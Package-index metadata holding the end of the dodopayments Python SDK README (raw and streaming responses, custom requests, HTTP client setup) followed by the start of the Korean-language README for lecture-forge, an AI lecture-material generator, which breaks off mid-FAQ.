### How to tell whether `None` means `null` or missing
In an API response, a field may be explicitly `null`, or missing entirely; in either case, its value is `None` in this library. You can differentiate the two cases with `.model_fields_set`:
```py
if response.my_field is None:
if 'my_field' not in response.model_fields_set:
print('Got json like {}, without a "my_field" key present at all.')
else:
print('Got json like {"my_field": null}.')
```
### Accessing raw response data (e.g. headers)
The "raw" Response object can be accessed by prefixing `.with_raw_response.` to any HTTP method call, e.g.,
```py
from dodopayments import DodoPayments
client = DodoPayments()
response = client.checkout_sessions.with_raw_response.create(
product_cart=[{
"product_id": "product_id",
"quantity": 0,
}],
)
print(response.headers.get('X-My-Header'))
checkout_session = response.parse() # get the object that `checkout_sessions.create()` would have returned
print(checkout_session.session_id)
```
These methods return an [`APIResponse`](https://github.com/dodopayments/dodopayments-python/tree/main/src/dodopayments/_response.py) object.
The async client returns an [`AsyncAPIResponse`](https://github.com/dodopayments/dodopayments-python/tree/main/src/dodopayments/_response.py) with the same structure, the only difference being `await`able methods for reading the response content.
#### `.with_streaming_response`
The above interface eagerly reads the full response body when you make the request, which may not always be what you want.
To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods.
```python
with client.checkout_sessions.with_streaming_response.create(
product_cart=[
{
"product_id": "product_id",
"quantity": 0,
}
],
) as response:
print(response.headers.get("X-My-Header"))
for line in response.iter_lines():
print(line)
```
The context manager is required so that the response will reliably be closed.
### Making custom/undocumented requests
This library is typed for convenient access to the documented API.
If you need to access undocumented endpoints, params, or response properties, the library can still be used.
#### Undocumented endpoints
To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other
http verbs. Options on the client will be respected (such as retries) when making this request.
```py
import httpx
response = client.post(
"/foo",
cast_to=httpx.Response,
body={"my_param": True},
)
print(response.headers.get("x-foo"))
```
#### Undocumented request params
If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request
options.
#### Undocumented response properties
To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You
can also get all the extra fields on the Pydantic model as a dict with
[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra).
### Configuring the HTTP client
You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including:
- Support for [proxies](https://www.python-httpx.org/advanced/proxies/)
- Custom [transports](https://www.python-httpx.org/advanced/transports/)
- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality
```python
import httpx
from dodopayments import DodoPayments, DefaultHttpxClient
client = DodoPayments(
# Or use the `DODO_PAYMENTS_BASE_URL` env var
base_url="http://my.test.server.example.com:8083",
http_client=DefaultHttpxClient(
proxy="http://my.test.proxy.example.com",
transport=httpx.HTTPTransport(local_address="0.0.0.0"),
),
)
```
You can also customize the client on a per-request basis by using `with_options()`:
```python
client.with_options(http_client=DefaultHttpxClient(...))
```
### Managing HTTP resources
By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting.
```py
from dodopayments import DodoPayments
with DodoPayments() as client:
# make requests here
...
# HTTP client is now closed
```
## Versioning
This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions:
1. Changes that only affect static types, without breaking runtime behavior.
2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_
3. Changes that we do not expect to impact the vast majority of users in practice.
We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience.
We are keen for your feedback; please open an [issue](https://www.github.com/dodopayments/dodopayments-python/issues) with questions, bugs, or suggestions.
### Determining the installed version
If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version.
You can determine the version that is being used at runtime with:
```py
import dodopayments
print(dodopayments.__version__)
```
## Requirements
Python 3.9 or higher.
## Contributing
See [the contributing documentation](https://github.com/dodopayments/dodopayments-python/tree/main/./CONTRIBUTING.md).
| text/markdown | null | Dodo Payments <support@dodopayments.com> | null | null | Apache-2.0 | null | [
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: OS Independent",
"Operating System :: POSIX",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"anyio<5,>=3.5.0",
"distro<2,>=1.7.0",
"httpx<1,>=0.23.0",
"pydantic<3,>=1.9.0",
"sniffio",
"typing-extensions<5,>=4.10",
"aiohttp; extra == \"aiohttp\"",
"httpx-aiohttp>=0.1.9; extra == \"aiohttp\"",
"standardwebhooks; extra == \"webhooks\""
] | [] | [] | [] | [
"Homepage, https://github.com/dodopayments/dodopayments-python",
"Repository, https://github.com/dodopayments/dodopayments-python"
] | twine/5.1.1 CPython/3.12.9 | 2026-02-20T09:34:47.053317 | dodopayments-1.84.0.tar.gz | 211,392 | 95/7e/c46ae33f8eba5d5fd76d9c24a649c52264ae21e0d8718a0ce440924120c3/dodopayments-1.84.0.tar.gz | source | sdist | null | false | c7a5d5ece17f47fa75f2ca0993d7798d | 35e04fd7c999978db2b00c122a48430cad4ba6ef073b57caf41d5cd52c6b2671 | 957ec46ae33f8eba5d5fd76d9c24a649c52264ae21e0d8718a0ce440924120c3 | null | [] | 686 |
2.4 | lecture-forge | 0.3.8 | AI-powered lecture material generator with multilingual support using LangChain | # LectureForge 🎓
**AI-Powered Lecture Material Generator using Multi-Agent Pipeline System**
[](https://www.python.org/downloads/)
[](https://github.com/bullpeng72/Lecture_forge)
[](https://opensource.org/licenses/MIT)
[](https://github.com/bullpeng72/Lecture_forge)
[](https://github.com/bullpeng72/Lecture_forge)
> 🚀 **v0.3.8 Beta Release** | RMC Self-Review 🧠 (hallucination detection, curriculum logic check, content quality review)
PDF, 웹페이지, 인터넷 검색에서 정보를 수집하여 고품질 강의자료를 자동 생성하는 AI 시스템입니다.
**핵심 통계**: 10개 에이전트 | 9개 도구 | 7개 CLI 명령 | 827개+ 테스트 (~48% 커버리지) | ~$0.035/60분 강의 | **Python 3.11 권장**
**데이터 위치**: `~/Documents/LectureForge/` (일반 폴더, Finder/탐색기에서 바로 접근)
---
## 📋 목차
- [주요 기능](#-주요-기능)
- [빠른 시작](#-빠른-시작)
- [사용법](#-사용법)
- [명령어 가이드](#-명령어-가이드)
- [FAQ](#-faq)
- [변경 이력](#-변경-이력)
- [기여하기](#-기여하기)
---
## ✨ 주요 기능
### 컨텐츠 생성
- 📚 **멀티소스 수집**: PDF, URL, 웹 검색을 통한 포괄적 정보 수집
- 📍 **Location-based 이미지 매칭**: RAG 컨텍스트 기반 자동 이미지 배치 (+750% 활용률)
- 🖼️ **대화형 이미지 편집**: 생성된 강의의 이미지 삭제/교체 (Vector DB 기반 대안 검색)
- 🎨 **구조화된 HTML 출력**: Mermaid 다이어그램, 검색 인덱스, 코드 하이라이팅
- 🎬 **프레젠테이션 슬라이드**: Reveal.js 기반 자동 변환 (v0.3.0 대폭 개선)
### 품질 보증
- ✅ **6차원 품질 평가**: 완성도, 흐름, 시간, 난이도, 시각자료, 정확성
- 🔄 **자동 개선**: 품질 기준 미달 시 최대 3회 자동 수정
- 🧠 **RMC 자기검토** (v0.3.8+): 에이전트 내부 2단계 자기반성 (Layer 1 검토 + Layer 2 검토의 검토)
- **CurriculumDesigner**: 섹션 순서 논리성, 학습목표 커버리지, 선수 내용 순서 자동 검증 및 수정
- **ContentWriter**: 개념 비약, 설명 모호성, 흐름 단절 등 의미론적 품질 검토 후 수정
- **QAAgent**: 각 주장을 소스 컨텍스트와 대조 → 할루시네이션 항목 제거 또는 경고 표시
- 🧪 **테스트 커버리지**: 827개+ 테스트 함수 (81개 파일, ~48% 커버리지)
### 지식 관리
- 🗄️ **RAG 기반 지식창고**: ChromaDB 벡터 DB로 대화형 Q&A 지원
- 🌐 **다국어 지원**: 한영 혼합 PDF 지원, 자동 언어 감지, Cross-lingual 검색 (v0.3.2+)
- 🎯 **고급 RAG 품질** (v0.3.5+):
- 400단어 구조화 답변 (5개 Markdown 섹션 강제)
- 15+15 듀얼 쿼리 검색 (다국어, top-12 결과)
- Rich Markdown 패널 렌더링 (터미널에서 아름다운 출력)
- 동적 신뢰도 점수 (ChromaDB L2 거리 올바른 변환)
- ⚡ **쿼리 캐싱**: 동일 질문 60% 빠른 응답
- 💬 **소스 인용**: 자동 참조 및 페이지 번호 제공
### 안정성 & 성능
- 🔄 **자동 재시도**: API 실패 시 지수 백오프 (최대 3회)
- 💰 **비용 추적**: 실시간 토큰 사용량 및 비용 추정
- 🔧 **타입 힌트**: 71% 타입 안정성
- 🎯 **예외 처리**: 구조화된 예외 시스템 (9개 카테고리)
- 📝 **프롬프트 관리**: 템플릿 기반 프롬프트 시스템
---
## 🚀 최근 개선사항 (v0.3.8)
**에이전트 내부 자기반성 시스템 (RMC - Reflective Meta-Cognition)**:
- **CurriculumDesigner**: 섹션 순서 난이도 계단식, 학습목표 커버리지, 선수 내용 배치 자동 수정
- **ContentWriter**: 개념 비약, 설명 모호성, 코드-설명 연결, 중복 내용 의미론적 검토 후 수정
- **QAAgent**: 각 주장 ✓/~/✗ 분류 → 소스 미지원(✗) 항목 제거 또는 경고 표시
- Non-critical 설계: RMC 실패 시 원본 반환, 기존 파이프라인 영향 없음
**LLM 거부 응답 수정** (`content_writer/agent.py`):
- 결론/도입 섹션 전용 안전 프롬프트 (`_build_structural_section_prompt()`)
- 거부 패턴 감지 시 안전 프롬프트로 자동 재시도
**Mermaid 슬라이드 버그 수정** (`--with-notes`):
- `SlideNotesGenerator`: BeautifulSoup `str(soup)` 시 `-->` → `-->` 인코딩 문제 수정
**Python 3.13 검증**: 전체 의존성 호환 확인
> 전체 변경 이력은 [아래 변경 이력](#-변경-이력) 참조
---
## 🚀 빠른 시작
### 1️⃣ 설치
#### 방법 1: pipx로 설치 (가장 간편 ⭐⭐)
```bash
# pipx 설치 (아직 없는 경우)
pip install pipx
pipx ensurepath
# lecture-forge 설치 (격리된 환경에서 자동 설치)
pipx install lecture-forge
# playwright 설치 (pipx 환경에 추가)
pipx inject lecture-forge playwright
pipx runpip lecture-forge install playwright
playwright install chromium
# 사용
lecture-forge create
```
**pipx의 장점**:
- ✅ 격리된 환경에서 자동 설치
- ✅ 시스템 전역에서 `lecture-forge` 명령 사용 가능
- ✅ 다른 Python 프로젝트와 의존성 충돌 없음
- ✅ conda/venv 환경 관리 불필요
#### 방법 2: PyPI + conda 환경 (권장 ⭐)
```bash
# Python 3.11 환경 생성 (강력 권장)
conda create -n lecture-forge python=3.11
conda activate lecture-forge
# PyPI에서 설치
pip install lecture-forge
# 웹 스크래핑용 브라우저 설치
playwright install chromium
```
#### 방법 3: 개발 설치 (소스 코드 수정 시)
```bash
# Git 클론
git clone https://github.com/bullpeng72/Lecture_forge.git
cd Lecture_forge
# Python 3.11 환경 생성
conda create -n lecture-forge python=3.11
conda activate lecture-forge
# 로컬 소스에서 설치
pip install -e .
# 웹 스크래핑용 브라우저 설치
playwright install chromium
```
> **Python 버전 호환성**:
> - ✅ **Python 3.11**: **강력 권장** - 모든 의존성 완벽 지원
> - ✅ **Python 3.12**: **완벽 지원** - v0.3.3부터 공식 지원
> - ✅ **Python 3.13**: **지원됨** - v0.3.8부터 검증 완료
>
> **Python 3.11, 3.12, 3.13 모두 지원합니다.**
### 2️⃣ 환경 설정
#### 방법 1: 대화형 설정 (권장 ⭐)
```bash
# 대화형 설정 마법사 실행
lecture-forge init
```
이 명령어는 다음을 수행합니다:
- ✅ 플랫폼별 최적 위치에 `.env` 파일 자동 생성
- **Windows**: `%USERPROFILE%\Documents\LectureForge\.env`
- **Mac/Linux**: `~/Documents/LectureForge/.env`
- ✅ 필수 API 키 입력 안내 (OpenAI, Serper)
- ✅ 선택적 이미지 검색 API 설정 (Pexels, Unsplash)
- ✅ 파일 권한 자동 설정 (Unix/Mac: 600)
#### 방법 2: 수동 설정
```bash
# .env 파일 생성 (프로젝트 개발 시)
cp .env.example .env
```
`.env` 파일을 열어 다음 항목을 설정하세요:
**필수 API 키**:
```bash
# OpenAI API (필수)
OPENAI_API_KEY=sk-proj-...
# 검색 API (필수)
SERPER_API_KEY=... # 무료: 2,500회/월
```
**선택 사항**:
```bash
# 이미지 검색 API (선택)
PEXELS_API_KEY=... # 무료 무제한
UNSPLASH_ACCESS_KEY=... # 무료: 50회/시간
# 검색 및 크롤링 설정 (기본값으로 충분)
SEARCH_NUM_RESULTS=10 # 검색 결과 수 (최대 100)
DEEP_CRAWLER_MAX_PAGES=10 # 크롤링 페이지 수
IMAGE_SEARCH_PER_PAGE=10 # 이미지 검색 결과 수
# 품질 설정
QUALITY_THRESHOLD=80 # 품질 임계값 (70-90)
MAX_ITERATIONS=3 # 최대 개선 반복 횟수
```
💡 **더 많은 설정 옵션은 `.env.example` 파일 참조**
#### .env 파일 위치
LectureForge는 다음 순서로 `.env` 파일을 탐색합니다:
1. **환경 변수**: `LECTURE_FORGE_ENV_FILE`로 지정한 경로
2. **현재 디렉토리**: `./.env`
3. **사용자 디렉토리** (권장):
- Windows: `%USERPROFILE%\Documents\LectureForge\.env`
- Mac/Linux: `~/Documents/LectureForge/.env`
**API 키 획득**:
- **OpenAI**: [platform.openai.com](https://platform.openai.com/) (사용량 기반 과금)
- **Serper**: [serper.dev](https://serper.dev/) (무료 2,500회/월)
- **Pexels**: [pexels.com/api](https://www.pexels.com/api/) (무료)
- **Unsplash**: [unsplash.com/developers](https://unsplash.com/developers) (무료 50회/시간)
### 3️⃣ 첫 강의 생성
```bash
lecture-forge create
```
대화형으로 강의 정보를 입력하면 자동으로 강의자료가 생성됩니다! 🎉
---
## 💻 사용법
### 명령어 개요
| 명령어 | 설명 | 주요 옵션 |
|--------|------|----------|
| **init** | 초기 설정 | `--path` |
| **create** | 강의 생성 | `--image-search`, `--quality-level` |
| **chat** | Q&A 모드 | `--knowledge-base` |
| **edit-images** | 이미지 편집 | `--output` |
| **improve** | 강의 향상 | `--to-slides` |
| **cleanup** | 지식베이스 관리 | `--all` |
| **home** | 폴더 열기 (v0.3.1+) | `outputs`, `data`, `kb`, `env` |
### 빠른 실행 예제
```bash
# 🚀 초기 설정 (처음 한 번만)
lecture-forge init
# 🎓 강의 생성 (대화형 - 가장 간단)
lecture-forge create
# 🎓 고품질 강의 (이미지 검색 포함)
lecture-forge create --image-search --quality-level strict
# 💬 Q&A 모드 (자동으로 최신 지식베이스 선택)
lecture-forge chat
# 🎨 슬라이드 변환
lecture-forge improve outputs/lecture.html --to-slides
# 🖼️ 이미지 편집
lecture-forge edit-images outputs/lecture.html
# 🧹 지식베이스 정리 (대화형 선택)
lecture-forge cleanup
# 📂 폴더 열기 (강의 결과물 확인)
lecture-forge home outputs
```
### 명령어 상세 가이드
#### 🚀 `init` - 초기 설정
**기본 사용:**
```bash
lecture-forge init
```
대화형 마법사가 API 키 입력을 안내하고 자동으로 `.env` 파일을 생성합니다.
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--path PATH` | 커스텀 디렉토리 지정 | `--path /custom/path` |
**기본 저장 위치:**
- **Windows**: `C:\Users\<username>\Documents\LectureForge\.env`
- **Mac/Linux**: `~/Documents/LectureForge/.env`
**예제:**
```bash
# 기본 위치에 설정 (권장)
lecture-forge init
# 커스텀 디렉토리 사용
lecture-forge init --path /my/config/dir
# 현재 디렉토리에 생성
lecture-forge init --path .
```
**하는 일:**
1. 필수 API 키 입력 (OpenAI, Serper)
2. 선택적 이미지 API 설정 (Pexels, Unsplash)
3. `.env` 파일 자동 생성
4. 기본 설정 값 자동 설정
5. 파일 권한 보안 설정 (Unix/Mac)
---
#### 📚 `create` - 강의 생성
**기본 사용:**
```bash
lecture-forge create
```
대화형으로 정보를 입력하면 자동으로 강의를 생성합니다.
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--config FILE` | YAML 설정 파일 사용 | `--config lecture.yaml` |
| `--image-search` | 웹 이미지 검색 활성화 (Pexels/Unsplash) | `--image-search` |
| `--quality-level LEVEL` | 품질 기준 설정 | `--quality-level strict` |
| `--output FILE` | 출력 파일명 지정 | `--output my_lecture.html` |
| `--async-mode` | Async I/O 사용 (70% 빠름, 실험적) | `--async-mode` |
| `--include-pdf-images` | PDF 이미지 포함 (비권장, Location-based가 더 좋음) | `--include-pdf-images` |
**품질 레벨:**
- `lenient` (70점): 빠른 초안
- `balanced` (80점): 기본값 ✅
- `strict` (90점): 고품질
**예제:**
```bash
# 기본 생성
lecture-forge create
# 고품질 + 이미지 검색
lecture-forge create --image-search --quality-level strict
# Async 모드 (70% 빠름, 실험적)
lecture-forge create --async-mode
# YAML 설정 사용
lecture-forge create --config my_config.yaml
```
---
#### 💬 `chat` - Q&A 모드
**기본 사용:**
```bash
lecture-forge chat
```
자동으로 최신 지식베이스를 선택합니다.
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--knowledge-base PATH` | 특정 지식베이스 지정 | `-kb ./data/vector_db/AI_xxx` |
**대화형 명령어:**
- `/help`: 도움말 표시
- `/exit`, `/quit`: 종료
- `Ctrl+C`: 강제 종료
**예제:**
```bash
# 자동 선택
lecture-forge chat
# 특정 지식베이스 사용
lecture-forge chat -kb ./data/vector_db/lecture_20260209_123456
```
---
#### 🖼️ `edit-images` - 이미지 편집
**기본 사용:**
```bash
lecture-forge edit-images outputs/lecture.html
```
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--output FILE` | 출력 파일 경로 | `-o outputs/edited.html` |
**대화형 명령어:**
| 명령어 | 설명 | 예시 |
|--------|------|------|
| `d <번호>` | 이미지 삭제 | `d 3` |
| `u <번호>` | 삭제 취소 | `u 3` |
| `r <번호>` | 이미지 교체 (Vector DB 검색) | `r 5` |
| `s` | 변경사항 저장 | `s` |
| `/exit`, `/quit` (또는 `q`) | 종료 (저장 안 함) | `/exit` |
| `h` | 도움말 | `h` |
**예제:**
```bash
# 기본 (원본_edited.html로 저장)
lecture-forge edit-images outputs/my_lecture.html
# 출력 파일 지정
lecture-forge edit-images outputs/my_lecture.html -o outputs/final.html
```
---
#### 🎨 `improve` - 강의 향상
**기본 사용:**
```bash
lecture-forge improve outputs/lecture.html --to-slides
```
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--to-slides` | Reveal.js 슬라이드 변환 | `--to-slides` |
| `--with-notes` | 슬라이드별 발표자 노트 자동 생성 (LLM) | `--with-notes` |
| `--slide-rewrite` | 슬라이드 최적화 LLM 재작성 (말줄임표 제거, ≤35자) | `--slide-rewrite` |
| `--enhance-pdf-images` | PDF 이미지 설명 추가 (레거시) | `--enhance-pdf-images` |
| `--source-pdf FILE` | 원본 PDF 경로 (레거시용) | `--source-pdf doc.pdf` |
⚠️ **주의**: `--enhance-pdf-images`는 레거시 기능입니다. v0.2.0부터는 Location-based 매칭이 자동으로 적용됩니다.
**예제:**
```bash
# 슬라이드 변환 (기본)
lecture-forge improve outputs/lecture.html --to-slides
# 발표자 노트 포함 (브라우저에서 S키)
lecture-forge improve outputs/lecture.html --to-slides --with-notes
# 슬라이드 최적화 재작성 (말줄임표 없는 완결된 bullet)
lecture-forge improve outputs/lecture.html --to-slides --slide-rewrite
# PDF 이미지 보강 (레거시)
lecture-forge improve outputs/lecture.html --enhance-pdf-images --source-pdf original.pdf
```
---
#### 🧹 `cleanup` - 지식베이스 관리
**기본 사용:**
```bash
lecture-forge cleanup
```
대화형으로 삭제할 지식베이스를 선택합니다.
**옵션:**
| 옵션 | 설명 | 사용 예 |
|------|------|---------|
| `--all` | 모든 지식베이스 삭제 (⚠️ 주의!) | `--all` |
**예제:**
```bash
# 대화형 선택 (안전)
lecture-forge cleanup
# 전체 삭제 (복구 불가능!)
lecture-forge cleanup --all
```
### 📤 출력 결과
강의 생성 완료 후 다음 파일들이 생성됩니다:
```
outputs/
├── [주제]_[날짜시간].html # 📄 HTML 강의자료
└── [주제]_[날짜시간]_slides.html # 🎬 슬라이드 (--to-slides 사용 시)
data/
└── vector_db/
└── [주제]_[날짜시간]/ # 🗄️ 지식베이스 (Q&A용)
├── chroma.sqlite3
└── ...
```
**포함 내용:**
- ✅ **HTML 강의자료**: 이미지, Mermaid 다이어그램, 코드 하이라이팅, 검색 인덱스
- ✅ **지식베이스**: ChromaDB 벡터 DB (대화형 Q&A 지원)
- ✅ **통계 정보**: 품질 점수, 토큰 사용량, 예상 비용
- ✅ **슬라이드**: Reveal.js 프레젠테이션 (선택 사항)
### 🔧 고급 설정 (.env 파일)
더 많은 제어가 필요한 경우 `.env` 파일에서 다음 설정을 조정할 수 있습니다:
```bash
# 검색 및 크롤링
SEARCH_NUM_RESULTS=20 # 기본: 10, 최대: 100
DEEP_CRAWLER_MAX_PAGES=30 # 기본: 10
DEEP_CRAWLER_MAX_DEPTH=3 # 기본: 2
# 이미지
IMAGE_SEARCH_PER_PAGE=15 # 기본: 10
MAX_IMAGES_PER_SEARCH=20 # 기본: 10
# 품질
QUALITY_THRESHOLD=90 # 기본: 80 (70-90)
MAX_ITERATIONS=5 # 기본: 3
# 성능
CHUNK_SIZE=800 # 기본: 1000 (작을수록 정밀)
WEB_SCRAPER_TIMEOUT=60 # 기본: 30초
```
💡 **전체 설정 목록**: `.env.example` 파일 참조 (15+ 환경변수)
---
## 🖼️ 이미지 편집
생성된 강의의 이미지를 대화형으로 편집할 수 있습니다.
### 기능
- **이미지 삭제**: 원하지 않는 이미지 제거
- **이미지 교체**: Vector DB에서 대안 이미지 자동 검색 및 교체
- **미리보기**: 변경 전 모든 이미지 상태 확인
- **안전한 저장**: 원본 백업 후 새 파일 생성
### 사용법
```bash
# 이미지 편집 모드 시작
lecture-forge edit-images outputs/lecture.html
# 출력 파일 지정
lecture-forge edit-images outputs/lecture.html -o outputs/lecture_v2.html
```
### 대화형 명령어
| 명령어 | 설명 | 예시 |
|--------|------|------|
| `d <번호>` | 이미지 삭제 | `d 3` |
| `u <번호>` | 삭제 취소 | `u 3` |
| `r <번호>` | 이미지 교체 (대안 검색) | `r 5` |
| `s` | 변경사항 저장 | `s` |
| `/exit`, `/quit` (또는 `q`) | 종료 | `/exit` |
| `h` | 도움말 | `h` |
### 작동 방식
1. **HTML 분석**: 강의 파일의 모든 이미지 추출 및 메타데이터 수집
2. **대화형 편집**: 테이블 형식으로 이미지 목록 표시 및 편집
3. **대안 검색**: Vector DB를 활용한 관련 이미지 자동 제안 (RAG 기반)
4. **변경 적용**: 삭제/교체 작업 일괄 적용 및 새 파일 생성
### 예제
```
📸 강의 이미지 편집 모드
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HTML: my_lecture.html
총 이미지: 25개
┏━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━━┓
┃ 번호 ┃ 설명 ┃ 섹션 ┃ 페이지 ┃ 상태 ┃
┡━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━━┩
│ 1 │ Neural network architecture │ 1. Introduction │ 5 │ 유지 │
│ 2 │ Backpropagation diagram │ 2. Core Concepts │ 12 │ 🗑️ 삭제 │
│ 3 │ Training process flowchart │ 2. Core Concepts │ 15 │ 🔄 교체 │
└──────┴───────────────────────────────────┴──────────────────┴────────┴──────────┘
명령 입력: r 3
🔍 이미지 3 대안 검색 중...
✅ 5개 대안 이미지 발견
선택: 1
✅ 이미지 3 교체 예정
명령 입력: s
💾 변경사항 저장됨: outputs/my_lecture_edited.html
```
---
## 🏗️ 시스템 아키텍처
### Multi-Agent 파이프라인 (10개 전문 에이전트)
```mermaid
flowchart TD
CLI["🖥️ CLI Interface<br/>입력 수집, 진행 상황, Q&A 인터랙션"]
Orchestrator["⚙️ Pipeline Orchestrator<br/>에이전트 조율 및 태스크 관리"]
Phase12["📚 Phase 1-2<br/>Collection & Analysis"]
KB["🗄️ Knowledge Base<br/>Vector DB + RAG Caching"]
Phase34["✍️ Phase 3-4<br/>Generation & Quality QA"]
Output["📤 Output<br/>HTML + Slides"]
CLI --> Orchestrator
Orchestrator --> Phase12
Orchestrator --> KB
Phase12 -->|저장| KB
KB -->|RAG Query| Phase34
Phase34 -->|RAG Query| KB
Phase34 --> Output
style CLI fill:#e1f5ff
style Orchestrator fill:#fff4e1
style Phase12 fill:#e8f5e9
style KB fill:#f3e5f5
style Phase34 fill:#fff9c4
style Output fill:#ffebee
```
### 10개 전문 에이전트
| # | 에이전트 | 역할 | 파일 |
|---|---------|------|------|
| 1 | **Content Collector** 📚 | 텍스트 수집 및 벡터화 | content_collector.py |
| 2 | **Image Collector** 🖼️ | 이미지 수집 및 Vision AI 분석 | image_collector.py |
| 3 | **Content Analyzer** 🔍 | 내용 분석 및 지식 그래프 | content_analyzer.py |
| 4 | **Curriculum Designer** 📋 | 강의 구조 설계 | curriculum_designer.py |
| 5 | **Content Writer** ✍️ | RAG 기반 컨텐츠 생성 | content_writer.py |
| 6 | **Diagram Generator** 📊 | Mermaid 다이어그램 생성 | diagram_generator.py |
| 7 | **Quality Evaluator** ✅ | 6차원 품질 평가 | quality_evaluator.py |
| 8 | **Revision Agent** 🔄 | 자동/반자동 수정 | revision_agent.py |
| 9 | **Q&A Agent** 🤖 | 지식창고 기반 대화 (RAG 캐싱) | qa_agent.py |
| 10 | **HTML Assembler** 🎨 | 최종 HTML 생성 | html_assembler.py |
### 9개 도구 (Tools)
| # | 도구 | 역할 | 파일 |
|---|------|------|------|
| 1 | **PDF Parser** 📄 | PDF 텍스트 추출 | pdf_parser.py |
| 2 | **Image Extractor** 🖼️ | PDF/HTML 이미지 추출 | image_extractor.py |
| 3 | **Web Scraper** 🌐 | 웹 페이지 스크래핑 | web_scraper.py |
| 4 | **Playwright Crawler** 🎭 | 동적 웹 크롤링 | playwright_crawler.py |
| 5 | **Deep Web Crawler** 🕷️ | 다층 웹 크롤링 (Hada.io) | deep_web_crawler.py |
| 6 | **Search Tool** 🔍 | Serper 검색 API | search_tool.py |
| 7 | **Image Search** 🎨 | Pexels/Unsplash 검색 | image_search.py |
| 8 | **PDF Image Describer** 📝 | GPT-4o Vision 이미지 설명 | pdf_image_describer.py |
| 9 | **Image Editor** ✂️ | 대화형 이미지 편집 | image_editor.py |
### 품질 평가 시스템 (6차원)
```mermaid
%%{init: {'theme':'base', 'themeVariables': { 'pie1':'#e8f5e9', 'pie2':'#bbdefb', 'pie3':'#fff9c4', 'pie4':'#f8bbd0', 'pie5':'#ffccbc', 'pie6':'#d1c4e9'}}}%%
pie title 품질 평가 가중치 분포
"내용 완성도 (학습 목표)" : 25
"논리적 흐름 (연결성)" : 20
"난이도 적합성 (레벨)" : 20
"시각자료 품질 (이미지)" : 15
"시간 적합성 (분량)" : 10
"기술적 정확성 (검증)" : 10
```
| 차원 | 가중치 | 평가 기준 | 세부 항목 |
|------|--------|----------|----------|
| 📝 내용 완성도 | **25%** | 학습 목표 달성도 | 주제 커버리지, 깊이, 예제 |
| 🔗 논리적 흐름 | **20%** | 섹션 간 연결성 | 구조, 전개, 응집성 |
| 🎯 난이도 적합성 | **20%** | 수강생 레벨 일치 | 용어, 복잡도, 사전 지식 |
| 🖼️ 시각자료 품질 | **15%** | 이미지/다이어그램 충분성 | 관련성, 품질, 배치 |
| ⏱️ 시간 적합성 | **10%** | 강의 시간 vs 분량 | 단어 수, 밀도, 페이싱 |
| ✅ 기술적 정확성 | **10%** | 사실 관계 검증 | 코드, 개념, 용어 |
**합격 기준**: 80점 이상 (자동 반복 개선, 최대 3회)
---
## ❓ FAQ
### 설치 및 설정
<details>
<summary><b>Q: 어떤 Python 버전이 필요한가요?</b></summary>
A: **Python 3.11, 3.12, 3.13 모두 지원합니다.**
- ✅ Python 3.11: 완벽 지원 (권장)
- ✅ Python 3.12: 완벽 지원 (v0.3.3+)
- ✅ Python 3.13: 지원됨 (v0.3.8+, 검증 완료)
```bash
# 버전 확인
python --version
# Python 3.11 환경 생성 (권장)
conda create -n lecture-forge python=3.11
conda activate lecture-forge
pip install lecture-forge
```
</details>
<details>
<summary><b>Q: API 키가 꼭 필요한가요?</b></summary>
A:
- **필수**: OpenAI API, Serper API
- **선택**: Pexels API, Unsplash API (이미지 검색용)
이미지 API 없이도 PDF/웹 이미지만으로 작동합니다.
</details>
<details>
<summary><b>Q: 비용이 얼마나 드나요?</b></summary>
A: **실제 측정 비용** (v0.2.4+ 기준):
- 60분 강의: 약 **$0.035**
- 180분 강의: 약 **$0.105**
(GPT-4o-mini 사용. 보수적 이론 추정: $0.22/180분)
생성 완료 후 정확한 비용이 표시됩니다.
</details>
<details>
<summary><b>Q: .env 파일 설정을 바꾸려면?</b></summary>
A: `.env` 파일을 열어 원하는 값을 수정하세요:
```bash
# 검색 결과 증가
SEARCH_NUM_RESULTS=20
# 크롤링 범위 확대
DEEP_CRAWLER_MAX_PAGES=30
# 타임아웃 증가
WEB_SCRAPER_TIMEOUT=60
```
변경 후 재시작하면 바로 적용됩니다.
</details>
### 사용법
<details>
<summary><b>Q: 오프라인에서 사용 가능한가요?</b></summary>
A:
